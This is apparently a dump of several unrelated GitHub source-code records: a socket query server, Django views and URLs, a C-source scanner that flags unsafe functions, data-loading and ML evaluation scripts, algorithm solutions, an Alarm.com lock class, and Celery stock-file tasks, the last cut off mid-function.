question_dict[\"is_solved\"] = question_params[6]\r\n question_dict[\"file_path\"] = question_params[7]\r\n question_dict[\"question_id\"] = question_params[8]\r\n subject_list.append(question_dict)\r\n subject_dict[subject_name] = subject_list\r\n\r\n\r\n\"\"\"\r\nthis function control the internet side of the server and setup the socket\r\nand listen to a connection from the user\r\ninput: None.\r\noutput: the socket created return the socket that the client connected\r\n\"\"\"\r\n\r\n\r\ndef connect():\r\n import socket\r\n\r\n serv_soc = socket.socket()\r\n serv_soc.bind((\"0.0.0.0\", 8482))\r\n\r\n serv_soc.listen(1)\r\n client_soc, client_address = serv_soc.accept()\r\n\r\n return client_soc, serv_soc\r\n\r\n\"\"\"\r\nsplit the data from the client to command and the parameters\r\ninput: client data\r\noutput: the protocol command and the parameter from the user\r\n\"\"\"\r\n\r\n\r\ndef slicing(client_data):\r\n command = client_data[:3]\r\n pram = client_data[3:]\r\n return command, pram\r\n\r\n\"\"\"\r\nthe following functions search for the user reqeust by the command and parameter\r\ninput: command and parameter\r\noutput: respond to send back to the client\r\n\r\n\"\"\"\r\n\r\n\r\ndef searching(command, pram):\r\n if command == \"SSUB\":\r\n return SSUB(pram)\r\n elif command == \"SUBJ\":\r\n return SUBJ(pram)\r\n elif command == \"FID\":\r\n return find_in_question(pram, \"difficulty_level\")\r\n\r\n\r\n\r\ndef SSUB(parm):\r\n for subject in subject_dict.values():\r\n for question in subject:\r\n if parm.lower() in question[\"sub_subject\"].lower():\r\n return question[\"\"]\r\n return None\r\n\r\n\r\ndef SUBJ(parm):\r\n question_list = []\r\n if parm.capitalize() in subject_dict.keys():\r\n for question in subject_dict[parm.capitalize()]:\r\n question_list.append(question[\"file_path\"])\r\n return '\\n'.join(question_list)\r\n\r\n\r\ndef find_in_question(parm, command):\r\n for subject in subject_dict.values():\r\n for question in subject:\r\n if parm.lower() in question[\"question_id\"].lower():\r\n return question[command]\r\n return None\r\n\r\n\r\n\r\ndef main():\r\n parsing()\r\n client_soc, serv_soc = connect()\r\n while True:\r\n client_data = client_soc.recv(1024)\r\n if not(client_data): # closing the network connection if there is no data from the client\r\n client_soc.close()\r\n serv_soc.close()\r\n break\r\n command, pram = slicing(client_data)\r\n answer = searching(command, pram)\r\n client_soc.send(answer) # send the suitable response back to the client\r\n\r\n\r\nmain()\r\n","repo_name":"ariel7590/PE_Fundementals_Project_1-1","sub_path":"Data Base/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27471798889","text":"from django.shortcuts import render, render_to_response\nfrom django.views.generic import View\nfrom sozluk.models import Entry, Post\n\n\ndef post_list(request):\n\n template_path = 'sozluk/entry_list.html'\n context = {}\n all_entry = Entry.objects.all()\n entry_list = []\n if all_entry:\n for entry in all_entry:\n entry_list.append(entry)\n context['entry_list'] = entry_list\n return render(request, template_path, context)\n","repo_name":"YaseminGrcn/sozluk","sub_path":"sozluk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71266557962","text":"#!/usr/bin/env python3\n\n# @author: Ian Guibas\n# This library does a simple quick scan of C source code\n# and looks for potentially dangerous snippets. Due to certain\n# aspects of computing, there is non-deterministic behaviour in\n# identifying particular program features. I have opted to simply\n# ensure some simple mistakes are avoided here.\n\nimport re\nimport os\nimport sys\n\n# Used for short circuit logic\nclass ShortCircuit(Exception):\n pass\n\nINSECURE = {'gets':0,\n 'scanf':1,\n 'sprintf':2,\n 'strcpy':3,\n 'strcat':4,\n 'tmpfile':5,\n 'mktemp':5\n }\n\nALTERNATIVES = {0:'fgets using standard input as the file stream',\n 1:'fgets for input then sscanf for parsing',\n 2:'snprintf',\n 3:'strncpy or strndup',\n 4:'strncat',\n 5:'mkstemp',\n }\n\nREASONS = { 0:'gets is deprecated and completely unbounded. It will ALWAYS' +\n 'lead to a buffer overflow and instability.',\n 1:'scanf does no bounds checking and can lead to a buffer ' +\n 'overflow.',\n 2:'sprintf does no bounds checking on the destination buffer ' +\n 'which can lead to buffer overflows and instability.',\n 3:'strcpy does not check that the source string fits into the ' +\n 'destination buffer which can lead to buffer overflows. ' +\n 'As an aside, strncpy may not provide the most efficient ' +\n 'behavior, depending upon the size of the source and ' +\n 'destination buffers.',\n 4:'strcat does not check that the total length does not exceed ' +\n 'the buffer size of the destination leading to buffer overflows.',\n 5:'tmpfile and mktemp often do not set the correct permissions ' +\n 'on the temporary files they create leading to potential ' +\n 'information leaks and/or undefined behaviour based upon ' +\n 'how the files get used.'}\n\n \ndef color(text, color, BOLD=False):\n \"\"\"ANSI Sequence wrapper for text, colorizes output\"\"\"\n ANSI_PREFIX = '\\x1b['\n ANSI_ENDS = '\\x1b[0m'\n ANSI_COLORS_FOREGROUND = {\n 'black' : ANSI_PREFIX + '90m',\n 'red' : ANSI_PREFIX + '91m',\n 'green' : ANSI_PREFIX + '92m',\n 'yellow' : ANSI_PREFIX + '93m',\n 'blue' : ANSI_PREFIX + '94m',\n 'magenta' : ANSI_PREFIX + '95m',\n 'cyan' : ANSI_PREFIX + '96m',\n 'white' : ANSI_PREFIX + '97m'\n }\n\n if color.lower() in ANSI_COLORS_FOREGROUND.keys():\n colored = ANSI_COLORS_FOREGROUND[color] + text + ANSI_ENDS\n if BOLD:\n colored = '\\x1b[1m' + colored\n return colored\n \n else: return text\n\nclass scanner:\n \"\"\"Scan source code for bad calls.\n Requires path to source file to scan\"\"\" \n\n def __init__(self, src):\n with open(src,'r') as f:\n self.source = f.readlines()\n \n def scan(self):\n \n # REGULAR EXPRESSIONS\n r_gets = re.compile(r'\\s*gets\\(.*\\);')\n r_scanf = re.compile(r'\\s*scanf\\(.*\\);')\n r_sprintf = re.compile(r'\\s*sprintf\\(.*\\);')\n r_strcpy = re.compile(r'\\s*strcpy\\(.*\\);')\n r_strcat = re.compile(r'\\s*strcat\\(.*\\);')\n r_tmpfile = re.compile(r'\\s*tmpfile\\(.*\\);')\n r_mktemp = re.compile(r'\\s*mktemp\\(.*\\);')\n r_badprintf = re.compile(r'\\s*printf\\([a-zA-Z].*')\n \n print('Scanning...')\n print()\n\n DANGER = '\\x1b[41m\\x1b[1mDANGER\\x1b[0m '\n WARN = '\\x1b[45m\\x1b[1mwarning\\x1b[0m '\n\n lineno = 0\n for line in self.source:\n lineno += 1\n try:\n if r_gets.match(line):\n code = INSECURE['gets']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(DANGER, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('gets()','red'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_scanf.match(line): \n code = INSECURE['scanf']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('scanf()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_sprintf.match(line): \n code = INSECURE['sprintf']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('sprintf()', 'green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_strcpy.match(line):\n code = INSECURE['strcpy']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('strcpy()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n \n if r_strcat.match(line):\n code = INSECURE['strcat']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('strcat()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_tmpfile.match(line):\n code = INSECURE['tmpfile']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('tmpfile()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_mktemp.match(line):\n code = INSECURE['mktemp']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('mktemp()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_badprintf.match(line):\n print(DANGER, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('printf(var)','red',True))\n print('Possible replacement: puts(var)')\n print('Reason: User input should never be passed directly '+\n 'to a format string function as printf makes ' +\n 'no distinction between a user string and format ' +\n 'string. This allows a user to specify formats to ' +\n 'both leak and modify the program memory as well ' +\n 'as hijack control flow and undermine various ' +\n 'security methods such as ASLR and Canary.')\n # No need to short circuit at end\n\n # No need to evaluate line for all RE's, stop on first match\n except ShortCircuit:\n print()\n pass\n\n def view_source(self):\n '''Attempts to view the source code in a human readable manner'''\n\n lineno = 1\n for line in self.source:\n line = line.replace('\\n','')\n print(str(lineno) + '\\t' + line)\n lineno += 1\n\n","repo_name":"ArthasLi/py_itu_mdb_1","sub_path":"test/venv/Lib/site-packages/fcfuzz/SS/sourcescan.py","file_name":"sourcescan.py","file_ext":"py","file_size_in_byte":8835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18673107392","text":"#! /usr/bin/python\nimport sqlite3\nimport sys\nimport os\nfrom datetime import datetime, timedelta\n\ndate = datetime.today()\nif sys.argv[1] == '-y':\n date = date - timedelta(days=1)\n del sys.argv[1]\ntimestamp = int(date.timestamp())\n\ntry:\n words = int(sys.argv[1])\nexcept:\n print(\"First argument must be a number\")\n sys.exit(1)\n\ndesc = None\nif len(sys.argv) > 2:\n desc = sys.argv[2]\ndbpath = os.environ.get(\"WORDCOUNT_DB\", \"wordcount.db\")\ndb = sqlite3.connect(dbpath)\ncur = db.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS wordcount(date INT NOT NULL, words INT NOT NULL, desc STRING)\")\ncur.execute(\"INSERT INTO wordcount VALUES(?, ?, ?)\", (timestamp, words, desc))\ndb.commit()\ndb.close()\n\n","repo_name":"carewdavid/wordtracker","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16816568927","text":"# -*- coding:utf -*-\n\nimport pandas as pd\n# import xlrd\nfrom db.action import PdDataAction, UploadFileAction\nfrom db.orm import PdData\n\n\n# 将指定文件名的Excel或者csv或者tsv文件解析,入库\n\n\ndef storage_data(file_name):\n corpus_file_path = \"../static/corpus/\" + file_name\n\n if file_name[-4:] == \".xls\": # .xls文件\n # data = xlrd.open_workbook(corpus_file_path)\n # excelTable = data.sheets()[0]\n # # 获取整行、整列、行数、列数、单元格中的值\n # print(excelTable.row_values(0)) # 获取第一行 list\n # print(excelTable.col_values(0)) # 获取第一列 list\n # print(excelTable.nrows) # 获取行数\n # print(excelTable.ncols) # 获取列数\n # print(excelTable.cell(0, 0)) # 获取第一行第一列对应的单元格的值\n data = pd.read_excel(corpus_file_path, header=None)\n elif file_name[-4:] == \".csv\": # .csv文件\n data = pd.read_csv(corpus_file_path, header=None)\n else: # .tsv文件\n data = pd.read_csv(corpus_file_path, sep='\\t', header=None)\n print(data)\n print(data.shape) # (401, 1)\n pdDatas = []\n row_num = data.shape[0]\n col_num = data.shape[1]\n pdDataAction = PdDataAction()\n uploadFileAction = UploadFileAction()\n\n for row_index in range(0, row_num):\n for col_index in range(0, col_num):\n\n print(data.iloc[row_index, col_index])\n\n uploadFile = uploadFileAction.GetUploadFileRecordByFileNameTid(file_name_tid=file_name)\n\n pdData = PdData(\n file_name_id=uploadFile.id,\n sheet_index=0,\n row_index=row_index + 1,\n col_index=col_index + 1,\n unit_value=data.iloc[row_index, col_index],\n invalid=False,\n )\n pdDatas.append(pdData)\n\n pdDataAction.InsertManyPdData(pdDatas)\n\n\nif __name__ == \"__main__\":\n test_file_name = \"2020052211511528963382193.csv\"\n storage_data(file_name=test_file_name)\n\n\n\n\n","repo_name":"CodeAsPoetry/NLP_Platform","sub_path":"scrapy_data/upload_excel.py","file_name":"upload_excel.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39147318865","text":"import dataclasses\nimport collections\nimport logging\nimport os\nimport sys\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, Tuple\nimport uuid\nimport json\n\ntry:\n import ConfigParser as configparser\nexcept:\n import configparser\n\n\n@dataclass\nclass ModelArguments:\n \"\"\"\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\n \"\"\"\n\n model_name_or_path: str = field(\n metadata={\n \"help\": \"Path to pretrained model or model identifier from huggingface.co/models\"\n }\n )\n config_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"Pretrained config name or path if not the same as model_name\"\n },\n )\n tokenizer_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"Pretrained tokenizer name or path if not the same as model_name\"\n },\n )\n use_fast: bool = field(\n default=False, metadata={\"help\": \"Set this flag to use fast tokenization.\"}\n )\n # If you want to tweak more attributes on your tokenizer, you should do it in a distinct script,\n # or just modify its tokenizer_config.json.\n cache_dir: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"Where do you want to store the pretrained models downloaded from s3\"\n },\n )\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n name: str = field(metadata={\"help\": \"The name of the dataset used\"})\n\n data_dir: str = field(\n metadata={\n \"help\": \"The input data dir. Should contain the .txt files for a CoNLL-2003-formatted task.\"\n }\n )\n positive_label: str = field(metadata={\"help\": \"Positive label - labelled as 1.\"})\n labels: Optional[str] = field(\n metadata={\"help\": \"Path to a training file from which to fetch the labels.\"}\n )\n file_name: str = field(metadata={\"help\": \"Filename to be used to read data in.\"})\n file_name_token: str = field(metadata={\"help\": \"filename of the token-level files\"})\n max_seq_length: int = field(\n default=128,\n metadata={\n \"help\": \"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\"\n },\n )\n overwrite_cache: bool = field(\n default=False,\n metadata={\"help\": \"Overwrite the cached training and evaluation sets\"},\n )\n\n\ndatasets = dict(\n fce_v1=DataTrainingArguments(\n name=\"fce_v1\",\n data_dir=\"data/fce_v1_tsv\",\n labels=\"data/fce_v1_tsv/fce-public.train.original.tsv_sentencelevel\",\n file_name=\"fce-public.{mode}.original.tsv_sentencelevel\",\n file_name_token=\"fce-public.{mode}.original.tsv\",\n positive_label=\"i\",\n ),\n conll10=DataTrainingArguments(\n name=\"conll10\",\n data_dir=\"data/conll10\",\n labels=\"data/conll10/conll10_task2_rev2.cue.train.tsv_sentencelevel\",\n file_name=\"conll10_task2_rev2.cue.{mode}.tsv_sentencelevel\",\n file_name_token=\"conll10_task2_rev2.cue.{mode}.tsv\",\n positive_label=\"C\",\n ),\n sst2_pos=DataTrainingArguments(\n name=\"sst2_pos\",\n data_dir=\"data/SST_labelling\",\n labels=\"data/SST_labelling/stanford_sentiment.train.sentences.positive.tsv\",\n file_name=\"stanford_sentiment.{mode}.sentences.positive.tsv\",\n file_name_token=\"stanford_sentiment.{mode}.tokens.positive.tsv\",\n positive_label=\"P\",\n ),\n sst2_neg=DataTrainingArguments(\n name=\"sst2_neg\",\n data_dir=\"data/SST_labelling\",\n labels=\"data/SST_labelling/stanford_sentiment.train.sentences.negative.tsv\",\n file_name=\"stanford_sentiment.{mode}.sentences.negative.tsv\",\n file_name_token=\"stanford_sentiment.{mode}.tokens.negative.tsv\",\n positive_label=\"N\",\n ),\n semeval_2013_twitter_pos=DataTrainingArguments(\n name=\"semeval_2013_twitter_pos\",\n data_dir=\"data/semeval15t10/semeval_2013_twitter\",\n labels=\"data/semeval15t10/semeval_2013_twitter/semeval15t10.sentences.positive.train2013.tsv\",\n file_name=\"semeval15t10.sentences.positive.{mode}2013.tsv\",\n file_name_token=\"semeval15t10.tokens.positive.{mode}2013.tsv\",\n positive_label=\"P\",\n ),\n semeval_2013_twitter_neg=DataTrainingArguments(\n name=\"semeval_2013_twitter_neg\",\n data_dir=\"data/semeval15t10/semeval_2013_twitter\",\n labels=\"data/semeval15t10/semeval_2013_twitter/semeval15t10.sentences.negative.train2013.tsv\",\n file_name=\"semeval15t10.sentences.negative.{mode}2013.tsv\",\n file_name_token=\"semeval15t10.tokens.negative.{mode}2013.tsv\",\n positive_label=\"N\",\n ),\n bea19=DataTrainingArguments(\n name=\"bea19\",\n data_dir=\"data/bea19\",\n labels=\"data/bea19/train.tsv_sentencelevel\",\n file_name=\"{mode}.tsv_sentencelevel\",\n file_name_token=\"{mode}.tsv\",\n positive_label=\"i\",\n )\n # sst2_pos_neg=DataTrainingArguments(\n # name=\"sst2_pos_neg\",\n # data_dir=\"data/SST-2/\",\n # labels=\"data/SST-2/train_token.tsv_sentencelevel\",\n # file_name=\"{mode}_token.tsv_sentencelevel\",\n # ),\n)\n\n\ndef is_float(value):\n \"\"\"\n Check in value is of type float()\n \"\"\"\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef parse_config(config_path, config_section=\"config\"):\n config_parser = configparser.SafeConfigParser(allow_no_value=True)\n config_parser.read(config_path)\n config = collections.OrderedDict()\n\n for key, value in config_parser.items(config_section):\n if value is None or len(value.strip()) == 0:\n config[key] = None\n elif value.lower() in [\"true\", \"false\"]:\n config[key] = config_parser.getboolean(config_section, key)\n elif value.isdigit():\n config[key] = config_parser.getint(config_section, key)\n elif is_float(value):\n config[key] = config_parser.getfloat(config_section, key)\n else:\n config[key] = config_parser.get(config_section, key)\n return config\n","repo_name":"bujol12/bert-seq-interpretability","sub_path":"utils/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"63"} +{"seq_id":"14124398018","text":"from itertools import combinations\n#import sys\n#sys.stdin = open(\"sample/input_15686.txt\", \"r\")\n\nn, m = map(int, input().split()) #도시의 크기 n, 선택할 치킨집 개수\ncity = [list(map(int, input().split())) for _ in range(n)]\nhouse, chicken = [], [] #집과 치킨집이 위치한 곳의 r, c 인덱스를 저장할 리스트\n\nfor r in range(n):\n for c in range(n):\n if city[r][c] == 1:\n house.append((r,c)) #집 위치\n elif city[r][c] == 2:\n chicken.append((r,c)) #치킨집 위치\n\n#모든 치킨집 중에서 m개의 치킨집을 뽑는 조합을 계산\ncandidates = list(combinations(chicken, m)) #치킨집개수Cm\n\n#치킨 거리를 계산\ndef get_sum(candidates):\n result = 0\n #모든 집에 대해 계산함\n for hr, hc in house:\n #가장 가까운 집을 찾음\n temp = 100\n for cr, cc in candidates:\n temp = min(temp, abs(hr-cr)+abs(hc-cc))\n #가장 가까운 치킨집 까지의 거리를 더함\n result += temp\n\n return result\n\n#치킨거리의 최소값을 찾아서 출력하게 됨\nresult = 10000\nfor candidate in candidates:\n result = min(result, get_sum(candidate))\n\nprint(result)","repo_name":"BIINNNN/prepare_CodingTest","sub_path":"Python3/BOJ/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22106491590","text":"import os\nimport json\nimport pytz\nimport torch\nimport datetime\nimport fasttext\n\nfrom os import path\nfrom config import Config\nfrom transformers import AutoTokenizer\n\nfrom dataset import MyDataSet\nfrom trainer import Trainer\nfrom model import Model\nfrom utils import load_model\nfrom config import get_config\n\n\ndef main(args):\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path)\n if args.use_fasttext:\n fasttext_model = fasttext.load_model(args.fasttext_path)\n else:\n fasttext_model = None\n print('--------------------- MODEL SETTING UP ---------------------')\n print(f'Loading model from checkpoint {args.load_ckpt}')\n model = Model(args)\n model.load_state_dict(torch.load(args.load_ckpt, map_location=torch.device('cpu')))\n\n\n params_num = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"#Params = \", params_num)\n\n print('--------------------- DATALOADER ---------------------')\n dev_data = MyDataSet(\n name='dev',\n path=args.dev_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n test_data = MyDataSet(\n name='test',\n path=args.test_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n human_test_data = MyDataSet(\n name='human_test',\n path=args.human_test_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n trainer = Trainer(args=args,\n model=model,\n train_data=None,\n dev_data=dev_data,\n test_data=test_data,\n human_test_data=human_test_data)\n\n dev_prec, dev_recal, dev_f1 = trainer.eval('dev')\n test_prec, test_recall, test_f1 = trainer.eval('test')\n htest_prec, htest_recall, htest_f1 = trainer.eval('human_test')\n\n\nif __name__ == \"__main__\":\n args = get_config()\n args.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(f'Using Device : {args.device}')\n\n if torch.cuda.is_available():\n print(f\"GPU device : {torch.cuda.get_device_name(0)}\")\n\n if not os.path.exists(args.ckpt_dir):\n os.makedirs(args.ckpt_dir)\n\n print('--------------------- EVALUATING ---------------------')\n main(args)\n","repo_name":"demdecuong/NER-biaffine","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19656945850","text":"from typing import *\n \n \ndef getDelta(f, n) -> (Dict[str, Set[str]], Dict[str, Set[str]], Set[str]):\n delta: Dict[str, Set[str]] = dict()\n generative: Dict[str, Set[str]] = dict()\n eps: Set[str] = set()\n for state in range(n):\n req: List[str] = f.readline().strip().split()\n if req[0] not in delta.keys():\n delta[req[0]] = set()\n if len(req) == 2:\n delta[req[0]].add('')\n else:\n delta[req[0]].add(req[2])\n \n for state in delta:\n if '' in delta[state]:\n eps.add(state)\n else:\n for way in delta[state]:\n if all([i.isupper() for i in way]):\n if state not in generative:\n generative[state] = set()\n generative[state].add(way)\n \n return delta, generative, eps\n \n \nf = open(\"epsilon.in\", \"r\")\nn, s = f.readline().split()\nn = int(n)\ndelta, generative, eps = getDelta(f, n)\nsize: int = len(eps)\n \nwhile True:\n for state in generative.copy():\n for way in generative[state]:\n if all([i in eps for i in way]):\n generative.pop(state, None)\n eps.add(state)\n break\n \n if len(eps) == size:\n break\n size = len(eps)\n \nwith open(\"epsilon.out\", \"w\") as f:\n epsStates: List[str] = sorted(list(eps))\n f.write(\" \".join(epsStates))","repo_name":"SotnikovMaksim/ITMO-Labs","sub_path":"DiscreteMathCourse/S2L2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42337651173","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom api.views import TagViewSet, IngredientViewSet, RecipeViewSet\nfrom users.views import CustomUserViewSet\n\napp_name = \"api\"\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(\"users\", CustomUserViewSet, \"users\")\nrouter.register(\"tags\", TagViewSet, \"tags\")\nrouter.register(\"ingredients\", IngredientViewSet, \"ingredients\")\nrouter.register(\"recipes\", RecipeViewSet, \"recipes\")\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(\"\", include(\"djoser.urls\")),\n path(\"auth/\", include(\"djoser.urls.authtoken\")),\n]\n","repo_name":"DPavlen/foodgram-project-react","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40689014906","text":"\"\"\"Alarm.com lock.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\nfrom . import BaseDevice, DeviceType\n\nlog = logging.getLogger(__name__)\n\n\nclass Lock(BaseDevice):\n \"\"\"Represent Alarm.com sensor element.\"\"\"\n\n class DeviceState(BaseDevice.DeviceState):\n \"\"\"Enum of lock states.\"\"\"\n\n # https://www.alarm.com/web/system/assets/customer-ember/enums/LockStatus.js\n\n UNKNOWN = 0\n LOCKED = 1\n UNLOCKED = 2\n\n class Command(BaseDevice.Command):\n \"\"\"Commands for ADC locks.\"\"\"\n\n LOCK = \"lock\"\n UNLOCK = \"unlock\"\n\n async def async_lock(self) -> None:\n \"\"\"Send lock command.\"\"\"\n\n await self.async_handle_external_desired_state_change(self.DeviceState.LOCKED)\n\n await self._send_action(\n device_type=DeviceType.LOCK,\n event=self.Command.LOCK,\n device_id=self.id_,\n )\n\n async def async_unlock(self) -> None:\n \"\"\"Send unlock command.\"\"\"\n\n await self.async_handle_external_desired_state_change(self.DeviceState.UNLOCKED)\n\n await self._send_action(\n device_type=DeviceType.LOCK,\n event=self.Command.UNLOCK,\n device_id=self.id_,\n )\n","repo_name":"pyalarmdotcom/pyalarmdotcomajax","sub_path":"pyalarmdotcomajax/devices/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"82"} +{"seq_id":"28286648767","text":"import logging\nfrom celery.schedules import crontab\nimport datetime as dt\n\nimport time\nfrom celery import Celery\nfrom ftplib import FTP\ncelery = Celery('tasks')\n\nfrom app.models import Stock\nimport os, sys\n\ncelery.conf.CELERY_BROKER = 'amqp://'\ncelery.conf.CELERY_BACKEND = 'amqp'\ncelery.conf.CELERY_TIMEZONE = 'UTC'\n\n# THIS IS UTC TIME, which is +4 hours of EST\nHOUR = 16 \nMINUTE = 10\n\n# READ THIS...\n#\n# Start the broker.\n# rabbitmq-server is located in /usr/local/sbin\n# /usr/local/sbin/rabbitmq-server -detached\n#\n# Start Celery from the ~/Code/python/cf2 directory\n# celery -app=tasks worker --loglevel=info -B\n\ncelery.conf.CELERYBEAT_SCHEDULE = {\n 'download_stock_files': {\n 'task': 'tasks.download_stock_files',\n 'schedule': crontab(hour=HOUR,minute=MINUTE)\n },\n 'parse_stock_files': {\n 'task': 'tasks.parse_stock_files',\n 'schedule': crontab(hour=HOUR,minute=MINUTE+1)\n }\n #'calculate_indicators': {\n # 'task': 'tasks.calculate_indicators',\n # 'schedule': crontab(hour=HOUR,minute=MINUTE)\n #}\n}\n\n@celery.task\ndef download_stock_files_task(): \n download_stock_files()\n\ndef download_stock_files(): \n logging.info('Begin downloading stock files...')\n try:\n ftp = FTP('ftp.nasdaqtrader.com') \n ftp.login()\n ftp.cwd('symboldirectory')\n ftp.retrbinary('RETR nasdaqlisted.txt', open('app/static/symbols/nasdaqlisted.txt', 'wb').write) \n ftp.retrbinary('RETR otherlisted.txt', open('app/static/symbols/otherlisted.txt', 'wb').write) \n logging.info('Finished downloading stock files.')\n except Exception as e:\n logging.warning(\"Couldn't download the nightly NASDAQ/NYSE files. Error message: %s\", e)\n\n@celery.task\ndef parse_stock_files_task():\n parse_stock_files()\n\ndef parse_stock_files():\n '''File information here: http://www.nasdaqtrader.com/trader.aspx?id=symboldirdefs'''\n logging.info('Begin parsing the files and refreshing stock data.')\n parse_nasdaq('NASDAQ')\n parse_other('NYSE')\n logging.info('Finished parsing the files and refreshing stock data.')\n\ndef parse_nasdaq(market):\n logging.info('Begin parsing %s file.', market)\n path = os.path.join(os.path.dirname(__file__),'app/static/symbols/nasdaqlisted.txt')\n with open(path, 'r') as inFile: \n next(inFile) # ignore header\n for line in inFile:\n #time.sleep(1)\n split= line.strip('\\r\\n').split('|')\n # if it's not a test stock and not the last line\n if split[3] != \"Y\" and \"File Creation Time\" not in split[0]:\n symbol = split[0]\n name = split[1]\n logging.info('Fetching data. Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n create_or_update_stock(symbol, name, market)\n logging.info('Finished parsing %s file.', market)\n\ndef create_or_update_stock(symbol, name, market):\n stock = Stock.query.filter(Stock.symbol == symbol,\n Stock.market=='NASDAQ').first()\n if stock is None:\n logging.info('New stock (not currently in our database): Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n stock = Stock(symbol=symbol,name=name,market=\"NASDAQ\")\n df = stock.get_dataframe()\n if df is None or len(df) == 0:\n logging.warning('Error retrieving Stock from the database (DataFrame is empty...): Stock.id: %s, Market: %s, Symbol: %s, Company Name: %s', stock.id, market, symbol, name)\n else:\n stock.calculate_indicators()\n\n\n@celery.task\ndef calculate_indicators_task():\n calculate_indicators()\n\ndef calculate_indicators():\n logging.info('Begin Calculating indicators for all stocks.')\n for stock in Stock.query.all():\n logging.info('Updating indicators for %s [%s]', stock.symbol, stock.name)\n stock.calculate_indicators()\n\ndef parse_other(market):\n logging.info('Begin parsing %s file.', market)\n path = os.path.join(os.path.dirname(__file__),'app/static/symbols/otherlisted.txt')\n with open(path, 'r') as inFile: \n next(inFile) # ignore header\n for line in inFile:\n #time.sleep(1)\n split = line.strip('\\r\\n').split('|')\n # if it's not a test stock and not the last line\n if 'File Creation Time' not in split[0] and split[2] == 'N' and split[6] != 'Y':\n symbol = split[7]\n name = 